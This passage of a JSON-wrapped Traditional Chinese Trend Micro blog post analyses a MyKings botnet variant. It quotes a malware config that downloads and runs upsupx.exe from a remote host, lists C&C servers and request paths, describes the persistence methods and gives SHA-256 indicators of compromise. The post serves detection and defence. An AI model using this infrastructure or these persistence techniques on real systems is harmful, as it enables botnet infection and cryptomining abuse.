<em>&nbsp;<\/em>\n  <em>count=6<\/em>\n  <em>&nbsp;<\/em>\n  <em>ip1=http[:\/\/]208.110.71.194<\/em>\n  <em>&nbsp;<\/em>\n  <em>ip2=http[:\/\/]80.85.152.247<\/em>\n  <em>&nbsp;<\/em>\n  <em>ip3=http[:\/\/]66.117.2.182<\/em>\n  <em>&nbsp;<\/em>\n  <em>ip4=http[:\/\/]70.39.124.70<\/em>\n  <em>&nbsp;<\/em>\n  <em>ip5=http[:\/\/]150.107.76.227<\/em>\n  <em>&nbsp;<\/em>\n  <em>ip6=http[:\/\/]103.213.246.23<\/em>\n  <\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>\u5efa\u7acb\u8d77C&amp;C\u4f3a\u670d\u5668\u9023\u7dda\u5f8c\uff0c\u6703\u5f9e\u4e0a\u8ff0\u4f3a\u670d\u5668\u5176\u4e2d\u4e4b\u4e00\u4e0b\u8f09\u53ef\u7531\u53d7\u611f\u67d3\u7a0b\u5e8f\u57f7\u884c\u7684shellcode \u2013 <em>TestMsg.tmp<\/em>\u3002\u5b83\u6703\u53c3\u8003<em>cloud.txt<\/em>\u4e26\u5305\u542b\u4ee5\u4e0b\u6587\u5b57\uff0c\u6bcf\u6b21\u90fd\u6709\u6240\u4e0d\u540c\uff1a<\/p>\n\n\n\n<table  class=\"wp-block-table table table-hover\" ><tbody><tr><td>\n  [config]\n  &nbsp;\n  url=about:blank\n  &nbsp;\n  exe=http[:\/\/]185.22.172.13\/upsupx.exe\n  <\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>\u6a94\u6848<em>upsupx.exe<\/em>\u6703\u88ab\u4e0b\u8f09\u5132\u5b58\u6210<em>C:\\Windows\\Temp\\conhost.exe<\/em>\u4e26\u57f7\u884c\u3002<\/p>\n\n\n\n<p><strong>\u4e3b\u4e0b\u8f09\u5668\uff08upsupx.exe\/conhost.exe<\/strong><strong>\uff09<\/strong><\/p>\n\n\n\n<p>\u60e1\u610f\u8edf\u9ad4\u70ba\u53d6\u5f97C&amp;C\u4f3a\u670d\u5668\u5730\u5740\u53ca\u4e0b\u8f09\u5176\u4ed6\u6709\u6548\u8f09\u8377\u800c\u57f7\u884c\u7684HTTP\u8acb\u6c42\u5217\u8868\u6574\u7406\u5982\u4e0b\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-6-1.png\" alt=\"A screenshot of a cell phone\n\nDescription automatically generated\"\/><\/figure>\n\n\n\n<p>\u57167. MyKings\u5411C&amp;C\u4f3a\u670d\u5668\u767c\u9001\u7684HTTP\u8acb\u6c42<\/p>\n\n\n\n<p>\u5b83\u6703\u5efa\u7acb<em>C:\\Program Files\\Common\nFiles\\xpdown.dat<\/em>\uff0c\u88e1\u9762\u5305\u542b\u4e86C&amp;C\u4f3a\u670d\u5668\u5217\u8868\u3002\u6700\u521d\u7684\u5217\u8868\u5982\u4e0b\uff1a<\/p>\n\n\n\n<ul><li>ok[.]xmr6b[.]ru<\/li><li>74[.]222[.]14[.]61<\/li><li>45[.]58[.]135[.]106<\/li><li>103[.]95[.]28[.]54<\/li><li>103[.]213[.]246[.]23<\/li><\/ul>\n\n\n\n<p>\u5b83\u63a5\u8457\u6703\u9078\u64c7\u5176\u4e2d\u4e00\u500b\u4f3a\u670d\u5668\u4f86\u4e0b\u8f09\u66f4\u65b0\u7684<em>xpdown.dat<\/em>\u3002\u5728\u6211\u5011\u7684\u5206\u6790\u4e2d\uff0c\u5b83\u5f9e\u4f3a\u670d\u566845[.]58[.]135[.]106\u4e0b\u8f09\uff0c\u88e1\u9762\u5305\u542b\u4ee5\u4e0b\u5167\u5bb9\uff1a<\/p>\n\n\n\n<ul><li>Ok[.]xmr6b[.]ru<\/li><li>61<\/li><li>74[.]222[.]14[.]61<\/li><li>139[.]5[.]177[.]10<\/li><li>45[.]58[.]135[.]106<\/li><\/ul>\n\n\n\n<p>\u4e00\u4f46\u9078\u5b9a\u4f3a\u670d\u5668\uff0c\u5b83\u6703\u5c07HTTP\u8acb\u6c42\u767c\u9001\u5230{server}\/ok\/down[.]html\u3001{server}\/ok\/64[.]html\u548c{server}\/ok\/vers[.]html\uff0c\u5982\u4e0b\u5716\u6240\u793a\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-7.png\" alt=\"A screenshot of a social media post\n\nDescription automatically generated\"\/><\/figure>\n\n\n\n<p>\u57168. \u767c\u9001\u5230\u5176\u4ed6\u4f3a\u670d\u5668\u7684HTTP\u8acb\u6c42<\/p>\n\n\n\n<p>\u6211\u5011\u752832\u4f4d\u5143\u7684\u96fb\u8166\u9032\u884c\u6e2c\u8a66\uff0c\u60e1\u610f\u8edf\u9ad4\u6703\u7e7c\u7e8c\u5f9e45[.]58[.]135[.]106\u4e0b\u8f09\u3002\u4f46\u4e0b\u8f09\u4f3a\u670d\u5668\u53ef\u80fd\u6703\u6839\u64da\u53d7\u611f\u67d3\u96fb\u8166\u662f32\u4f4d\u5143\u9084\u662f64\u4f4d\u5143\u800c\u6709\u6240\u4e0d\u540c\u3002<\/p>\n\n\n\n<p>\u5b83\u63a5\u8457\u6703\u4e0b\u8f09<em>kill.txt<\/em>\uff0c\u9019\u662f\u5728\u6700\u7d42\u5f9e<em>downs.txt<\/em>\u53d6\u5f97\u4e0b\u8f09\u548c\u57f7\u884c\u6a94\u6848\u5217\u8868\u524d\u8981\u7d42\u6b62\u7684\u7a0b\u5e8f\u5217\u8868\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-8.png\" alt=\"Figure 9. Downloading downs.txt\"\/><\/figure>\n\n\n\n<p>\u57169. \u4e0b\u8f09downs.txt<\/p>\n\n\n\n<p>\u9032\u4e00\u6b65\u6aa2\u67e5\u9019\u4e9b\u4e0b\u8f09\u7684\u6a94\u6848\uff0c\u53ef\u4ee5\u770b\u51fa\u5b83\u5011\u7684\u76ee\u7684\u662f\u70ba\u4e86\u5728\u7cfb\u7d71\u91cd\u555f\u6642\u91cd\u8907\u611f\u67d3\u9031\u671f\u3002\u522a\u9664\u53ef\u898b\u7684\u6301\u7e8c\u6027\u6a5f\u5236\u4e0d\u6703\u5b8c\u5168\u6d88\u9664\u611f\u67d3\u72c0\u6cc1\u3002<em>Msief.exe<\/em>\u662f\u4e00\u500b\u5305\u542b<em>c3.bat<\/em>\u6279\u6b21\u6a94\u7684\u81ea\u89e3\u58d3\u7e2e\u6a94\uff0c\u9019\u6279\u6b21\u6a94\u6703\u9032\u884c\u6240\u6709\u7684\u5de5\u4f5c\u6392\u7a0b\u3001WMI\u548c\u8a3b\u518a\u8868\u81ea\u52d5\u555f\u52d5\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>\u8a17\u7ba1\u5f0f\u5075\u6e2c\u53ca\u56de\u61c9\u5982\u4f55\u5e6b\u52a9\u8655\u7406MyKings\u9019\u6a23\u7684\u6bad\u5c4d\u7db2\u8def<\/strong>?<\/h2>\n\n\n\n<p>\u5728\u9019\u7a2e\u60c5\u6cc1\u4e0b\uff0c\u8da8\u52e2\u79d1\u6280<a href=\"https:\/\/www.trendmicro.com\/en_ph\/business\/products\/user-protection\/sps\/endpoint\/managed-detection-response.html\">\u8a17\u7ba1\u5f0f\u5075\u6e2c\u53ca\u56de\u61c9<\/a>\u9019\u6a23\u7684\u5916\u5305\u8cc7\u5b89\u670d\u52d9\u6210\u70ba\u5bf6\u8cb4\u7684\u8cc7\u7522\u3002MDR\u63d0\u4f9b\u4e86\u8abf\u67e5\u4e8b\u4ef6\u548c\u5206\u6790\u5a01\u8105\u7684\u80fd\u529b\uff0c\u66f4\u91cd\u8981\u7684\u662f\u53ef\u4ee5\u95dc\u806f\u770b\u4f3c\u7121\u95dc\u7684\u6307\u6a19\u4f86\u7372\u53d6\u4e8b\u4ef6\u5168\u8c8c\uff0c\u70ba\u653b\u64ca\u63d0\u4f9b\u8108\u7d61\u8cc7\u8a0a\u3002<\/p>\n\n\n\n<p>\u7279\u5225\u53ef\u4ee5\u5f9e\u6b64\u6848\u4f8b\u770b\u51fa\u6b64\u670d\u52d9\u7684\u597d\u8655\uff0c\u611f\u67d3\u4e8b\u4ef6\u5728\u5169\u5e74\u4f86\u90fd\u672a\u88ab\u767c\u73fe\u3002\u6211\u5011\u6240\u7528\u7684\u5de5\u5177\u53ca\u5c0dMyKings\u7684\u719f\u6089\u8b93\u6211\u5011\u53ef\u4ee5\u5feb\u901f\u5730\u8b58\u5225\u51fa\u5a01\u8105\uff0c\u4e26\u63a5\u8457\u70ba\u53d7\u5f71\u97ff\u7684\u516c\u53f8\u63d0\u4f9b\u88dc\u6551\u7b56\u7565\u3002<\/p>\n\n\n\n<p>\u63d0\u4f9b\u4e86\u64c1\u6709\u8c50\u5bcc\u7d93\u9a57\u4e14\u5c08\u9577\u8907\u96dc\u5b89\u5168\u5de5\u5177\u7684\u8cc7\u5b89\u5c08\u5bb6\uff0c\u66f4\u5feb\u66f4\u6709\u6548\u5730\u4f86\u8b58\u5225\u611f\u67d3\u93c8\u4e26\u95dc\u806f\u7db2\u5740\u5075\u6e2c\u3001\u6f0f\u6d1e\u653b\u64ca\u3001\u81ea\u52d5\u555f\u52d5\u6a5f\u5236\u548c\u60e1\u610f\u6a94\u6848\u3002\u5e95\u4e0b\u7684\u5716\u8868\u8aaa\u660e\u4e86\u5982\u4f55\u4f7f\u7528\u8cc7\u5b89\u5de5\u5177\u4f86\u7c21\u6f54\u5730\u63cf\u8ff0\u51fa\u50cfMyKings\u9019\u6a23\u8907\u96dc\u7684\u6bad\u5c4d\u7db2\u8def\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-9.png\" alt=\" Figure 10. Bootkit installation chain showing access to DR0 (MBR)\"\/><\/figure>\n\n\n\n<p>\u571610. Bootkit\u5b89\u88dd\u93c8\u986f\u793a\u5c0dDR0\uff08MBR\uff09\u7684\u5b58\u53d6<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/08\/mykings-bootloader-persistence-10.png\" alt=\"Figure 11. The infection chain upon restart, with the persistence mechanisms like WMIC.exe, schtasks.exe, and reg.exe clearly visible\"\/><\/figure>\n\n\n\n<p>\u571611. \u91cd\u555f\u5f8c\u7684\u611f\u67d3\u93c8\uff0cWMIC.exe\u3001schtasks.exe\u548creg.exe\u7b49\u6301\u7e8c\u6027\u6a5f\u5236\u6e05\u6670\u53ef\u898b<\/p>\n\n\n\n<p>\u9664\u4e86\u7cbe\u901a\u5167\u90e8\u53ca\u5916\u90e8\u7684\u5a01\u8105\u60c5\u5831\u8cc7\u6e90\u5916\uff0c\u8da8\u52e2\u79d1\u6280\u7684<a href=\"https:\/\/www.trendmicro.com\/zh_tw\/business\/products\/user-protection\/sps\/endpoint\/managed-detection-response.html\"><em> <\/em>MDR&nbsp;<\/a>\u5718\u968a\u9084\u64c1\u6709\u4f7f\u7528\u8da8\u52e2\u79d1\u6280\u9032\u968e\u5b89\u5168\u89e3\u6c7a\u65b9\u6848\u7684\u7d93\u9a57\uff0c\u5305\u62ec\u4e86<a href=\"https:\/\/www.trendmicro.com\/zh_tw\/business\/products\/network\/advanced-threat-protection.html\">\u8da8\u52e2\u79d1\u6280\u7684Deep Discovery Inspector<\/a>\uff0c\u53ef\u4ee5\u5075\u6e2c\u5a01\u8105\u5728\u7d44\u7e54\u5167\u90e8\u7684\u6a6b\u5411\u79fb\u52d5\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>\u5165\u4fb5\u6307\u6a19\uff08IoC<\/strong><strong>\uff09<\/strong><\/h2>\n\n\n\n<style>\n   table {border-collapse:collapse; table-layout:fixed; width:310px;}\n   table td {border:solid 1px ; width:100px; word-wrap:break-word;}\n   <\/style>\n\n<table  class=\"wp-block-table table table-hover\" ><tbody><tr><td>\n  \u6a94\u6848\u540d\u7a31\n  <\/td><td>\n  SHA-256\u96dc\u6e4a\u503c\n  <\/td><td>\n  \u5075\u6e2c\u540d\u7a31\n  <\/td><\/tr><tr><td>\n  b2.exe \/ msief.exe\n  <\/td><td>\n  e8ddefd237646a47debc01df9aa02fbcae40686f96b7860511c73798c7546201\n  <\/td><td>\n  Backdoor.Win32.MIRAI.THGBIAI\n  <\/td><\/tr><tr><td>\n  s \/ p\n  <\/td><td>\n  7a4f2f2702fababb0619556e67a41d0a09e01fbfdb84d47b4463decdbb360980\n  <\/td><td>\n  BAT_DLOAD.SMJ\n  <\/td><\/tr><tr><td>\n  ps\n  <\/td><td>\n  d5f907f9d2001ee5013c4c1af965467714bbc0928112e54ba35d142c8eab68bf\n  <\/td><td>\n  BAT_DLOAD.SMJ\n  <\/td><\/tr><tr><td>\n  upsupx.exe\n  <\/td><td>\n  790c213e1227adefd2d564217de86ac9fe660946e1240b5415c55770a951abfd\n  <\/td><td>\n  Win32.MALXMR.TIAOODBF\n  <\/td><\/tr><tr><td>\n  item.rar \/ item.dat\n  <\/td><td>\n  80f8ba7992a5dbaa4a2f76263258d5d7bf3bb8994f9e8a4a5294f70ab8e38ea4\n  <\/td><td>\n  Coinminer.Win32.WMINE.AA\n  <\/td><\/tr><tr><td>\n  ps\n  <\/td><td>\n  ab26a859633d1ec68e021226fab47870ed78fc2e6a58c70a7a7060be51247c1d\n  <\/td><td>\n  Trojan.SH.BOTGET.AA\n  <\/td><\/tr><tr><td>\n  s.rar\n  <\/td><td>\n  a3bb132ab1ba3e706b90d6fb514504105f174c4e444e87be7bce1995f798044d\n  <\/td><td>\n  Trojan.Win32.FUGRAFA.AB\n  <\/td><\/tr><tr><td>\n  item.dat\n  <\/td><td>\n  79bcb0b7ba00c4c65bf9b41cfe193fd917d92ab1d41456ac775836cec5cadc9a\n  <\/td><td>\n  Trojan.Win32.SYMMI.AA\n  <\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>@\u539f\u6587\u51fa\u8655\uff1a<a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/uncovering-a-mykings-variant-with-bootloader-persistence-via-managed-detection-and-response\/\">Uncovering\na MyKings Variant With Bootloader Persistence via Managed Detection and\nResponse<\/a> \u4f5c\u8005\uff1aMiguel Ang\uff0cErika Mendoza\u548cBuddy Tancio\uff08\u8da8\u52e2\u79d1\u6280\uff09<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4e9e\u592a\u5730\u5340\u4e00\u5bb6\u96fb\u5b50\u516c\u53f8\u5728\u4e94\u6708\u5c0e\u5165\u8a17\u7ba1\u5f0f\u5075\u6e2c\u53ca\u56de\u61c9(Managed Detection and Response\uff0c [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":"","_wpscppro_dont_share_socialmedia":false,"_wpscppro_custom_social_share_image":0,"_facebook_share_type":"","_twitter_share_type":"","_linkedin_share_type":"","_pinterest_share_type":"","_linkedin_share_type_page":"","_instagram_share_type":"","_medium_share_type":"","_threads_share_type":"","_google_business_share_type":"","_selected_social_profile":[],"_wpsp_enable_custom_social_template":false,"_wpsp_social_scheduling":{"enabled":false,"datetime":null,"platforms":[],"status":"template_only","dateOption":"today","timeOption":"now","customDays":"","customHours":"","customDate":"","customTime":"","schedulingType":"absolute"},"_wpsp_active_default_template":true},"categories":[3877,1268,11],"tags":[4036,4396,2344,23],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts\/61824"}],"collection":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=61824"}],"version-history":[{"count":0,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=\/wp\/v2\/posts\/61824\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=61824"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=61824"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.trendmicro.com.tw\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=61824"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}